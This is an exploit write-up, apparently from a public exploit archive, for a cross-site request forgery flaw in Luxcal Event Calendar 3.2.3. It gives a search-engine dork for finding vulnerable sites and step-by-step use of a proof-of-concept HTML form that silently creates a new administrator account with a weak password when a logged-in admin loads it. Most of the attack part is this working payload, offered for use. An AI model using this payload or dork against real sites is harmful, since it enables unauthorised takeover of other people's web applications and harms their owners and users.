Authored by indoushka

Luxcal Event Calendar version 3.2.3 suffers from a cross site request forgery vulnerability.

| # Title : Luxcal Event Calendar v3.2.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |
| # Vendor : |
| # Dork : powered by LuxSoft |

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 2.

[+] Set the target site link Save changes and apply .

[+] infected file : index.php


[+] save code as poc.html .

<form method="POST" name="form0" action="">
<input type="hidden" name="uname" value="tcyber"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="new_pw" value="123456"/>
<input type="hidden" name="userRights" value="9"/>
<input type='submit' name='addExe' value="Add Profile">

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas**LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |